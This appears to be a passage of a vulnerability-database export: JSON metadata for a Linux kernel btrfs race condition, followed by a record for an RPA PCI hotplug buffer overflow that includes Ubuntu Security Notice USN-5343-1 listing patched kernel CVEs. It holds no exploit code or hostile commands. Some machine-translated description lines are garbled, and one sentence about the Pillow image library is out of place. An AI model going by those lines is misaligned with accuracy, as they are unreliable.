        "id": "ESB-2021.1694",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162969",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-388477",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28964",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "id": "VAR-202103-1240",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:01:00.127000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "btrfs",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "title": "Linux kernel Repair measures for the competition condition problem loophole",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=145653"
      },
      {
        "title": "Red Hat: CVE-2021-28964",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-28964"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-28964 log"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.1
      },
      {
        "problemtype": "Race condition (CWE-362) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28964"
      },
      {
        "trust": 1.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=dbcc7d57bffc0c8cac9dac11bec548597d59a6a5"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210430-0003/"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ptrnpqtz4gvs46sz4obxy5ydogvpstgq/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t2s3i4slrnruqdofyus6iuazmqnmpnlg/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t2s3i4slrnruqdofyus6iuazmqnmpnlg/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ptrnpqtz4gvs46sz4obxy5ydogvpstgq/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162939/ubuntu-security-notice-usn-4979-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1919"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162981/ubuntu-security-notice-usn-4984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1964"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2217"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162549/ubuntu-security-notice-usn-4948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1655"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1946"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1307"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1625"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-denial-of-service-via-get-old-root-34912"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1231"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166568/ubuntu-security-notice-usn-5361-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1299"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1694"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1408"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31916"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29647"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29264"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28952"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/362.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28964"
      },
      {
        "trust": 0.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/198508"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1046.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-74.83~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1040.41"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1044.46~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1044.47~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4982-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1044.47"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1016.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1048.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-74.83"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1046.50~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1048.50~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1049.51~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1016.17~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1049.51"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1033.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28038"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4984-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-55.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1028.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-55.62~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3428"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1092.94"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4979-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1115.128"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1103.110"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1100.113"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1072.80"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-144.148"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1103.112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-42739"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5361-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0935"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45486"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3702"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12888"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39636"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4948-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29266"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29657"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29649"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28951"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3491"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29646"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-22T00:00:00",
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "date": "2021-03-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "date": "2021-11-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "date": "2021-06-04T13:36:04",
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "date": "2021-06-04T22:09:37",
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "date": "2021-06-03T14:55:48",
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "date": "2022-04-01T15:43:33",
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "date": "2021-05-12T13:52:40",
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "date": "2021-03-22T09:15:13.517000",
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "date": "2021-03-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-06-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "date": "2021-03-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "date": "2021-11-29T06:03:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "date": "2023-11-07T03:32:25.077000",
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "date": "2022-04-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Race Vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "competition condition problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ],
    "trust": 0.6
  }
}

var-202103-1244
Vulnerability from variot

In drivers/pci/hotplug/rpadlpar_sysfs.c in the Linux kernel through 5.11.8, the RPA PCI Hotplug driver has a user-tolerable buffer overflow when writing a new device name to the driver from userspace, allowing userspace to write data to the kernel stack frame directly. This occurs because add_slot_store and remove_slot_store mishandle drc_name '\0' termination, aka CID-cc7a0bb058b8. Linux Kernel Exists in a classic buffer overflow vulnerability. Vendor exploits this vulnerability CID-cc7a0bb058b8 It is published as.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ========================================================================== Ubuntu Security Notice USN-5343-1 March 22, 2022

linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 ESM
  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-kvm: Linux kernel for cloud environments - linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)

It was discovered that the aufs file system in the Linux kernel did not properly restrict mount namespaces, when mounted with the non-default allow_userns option set. A local attacker could use this to gain administrative privileges. (CVE-2016-2853)

It was discovered that the aufs file system in the Linux kernel did not properly maintain POSIX ACL xattr data, when mounted with the non-default allow_userns option. A local attacker could possibly use this to gain elevated privileges. (CVE-2016-2854)

It was discovered that the f2fs file system in the Linux kernel did not properly validate metadata in some situations. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19449)

It was discovered that the XFS file system implementation in the Linux kernel did not properly validate meta data in some circumstances. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service. (CVE-2020-12655)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly handle error conditions in some situations, leading to an infinite loop. A local attacker could use this to cause a denial of service. (CVE-2020-25673)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)

It was discovered that the BR/EDR pin-code pairing procedure in the Linux kernel was vulnerable to an impersonation attack. A physically proximate attacker could possibly use this to pair to a device without knowledge of the pin-code. (CVE-2020-26555)

It was discovered that the bluetooth subsystem in the Linux kernel did not properly perform access control. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)

It was discovered that the FUSE user space file system implementation in the Linux kernel did not properly handle bad inodes in some situations. A local attacker could possibly use this to cause a denial of service. (CVE-2020-36322)

It was discovered that the Infiniband RDMA userspace connection manager implementation in the Linux kernel contained a race condition leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possible execute arbitrary code. A privileged attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-20292)

It was discovered that a race condition existed in the timer implementation in the Linux kernel. A privileged attacker could use this to cause a denial of service. (CVE-2021-20317)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)

It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)

It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)

It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)

It was discovered that the CIPSO implementation in the Linux kernel did not properly perform reference counting in some situations, leading to use- after-free vulnerabilities. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33033)

It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)

Asaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the Linux kernel did not properly validate large MTU requests from Virtual Function (VF) devices. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33098)

Norbert Slusarek discovered that the CAN broadcast manger (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-34693)

马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)

It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)

It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564)

It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device detach events, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3573)

Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)

It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)

It was discovered that the Virtio console implementation in the Linux kernel did not properly validate input lengths in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-38160)

It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly compute the access permissions for shadow pages in some situations. A local attacker could use this to cause a denial of service. (CVE-2021-38198)

It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)

It was discovered that the NFC implementation in the Linux kernel did not properly handle failed connect events leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2021-38208)

It was discovered that the configfs interface for USB gadgets in the Linux kernel contained a race condition. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2021-39648)

It was discovered that the ext4 file system in the Linux kernel contained a race condition when writing xattrs to an inode. A local attacker could use this to cause a denial of service or possibly gain administrative privileges. (CVE-2021-40490)

It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008)

It was discovered that the ISDN CAPI implementation in the Linux kernel contained a race condition in certain situations that could trigger an array out-of-bounds bug. A privileged local attacker could possibly use this to cause a denial of service or execute arbitrary code. (CVE-2021-43389)

It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095)

Wenqing Liu discovered that the f2fs file system in the Linux kernel did not properly validate the last xattr entry in an inode. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-45469)

Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485)

It was discovered that the per cpu memory allocator in the Linux kernel could report kernel pointers via dmesg. An attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. (CVE-2018-5995)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 ESM: linux-image-4.4.0-1103-kvm 4.4.0-1103.112 linux-image-4.4.0-1138-aws 4.4.0-1138.152 linux-image-4.4.0-222-generic 4.4.0-222.255 linux-image-4.4.0-222-lowlatency 4.4.0-222.255 linux-image-aws 4.4.0.1138.143 linux-image-generic 4.4.0.222.229 linux-image-kvm 4.4.0.1103.101 linux-image-lowlatency 4.4.0.222.229 linux-image-virtual 4.4.0.222.229

Ubuntu 14.04 ESM: linux-image-4.4.0-1102-aws 4.4.0-1102.107 linux-image-4.4.0-222-generic 4.4.0-222.255~14.04.1 linux-image-4.4.0-222-lowlatency 4.4.0-222.255~14.04.1 linux-image-aws 4.4.0.1102.100 linux-image-generic-lts-xenial 4.4.0.222.193 linux-image-lowlatency-lts-xenial 4.4.0.222.193 linux-image-virtual-lts-xenial 4.4.0.222.193

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

